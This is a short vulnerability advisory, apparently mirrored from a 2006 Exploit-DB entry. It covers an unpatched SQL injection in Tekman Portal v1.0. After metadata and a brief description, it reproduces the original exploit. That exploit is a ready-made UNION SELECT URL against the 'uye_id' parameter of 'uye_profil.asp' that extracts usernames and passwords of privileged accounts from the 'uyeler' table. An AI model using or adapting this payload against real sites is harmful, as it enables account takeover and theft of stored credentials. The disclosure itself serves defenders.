Tekman Portal v1.0 (tr) SQL Injection Vulnerability

vendor:

Tekman Portal

by:

Fix TR

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Tekman Portal

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:tekman:tekman_portal:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Tekman Portal v1.0 (tr) SQL Injection Vulnerability

A SQL injection vulnerability exists in Tekman Portal v1.0 (tr) due to improper sanitization of user-supplied input to the 'uye_id' parameter in 'uye_profil.asp'. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the context of the application, allowing for the retrieval of sensitive data from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                       +
+ Site    : www.hack.gen.tr                              +
+ Contact : fixtr[at]bsdmail.com                         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In  : uye_profil.asp
+ Risk    : High


+ Exp.

http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2

# milw0rm.com [2006-09-19]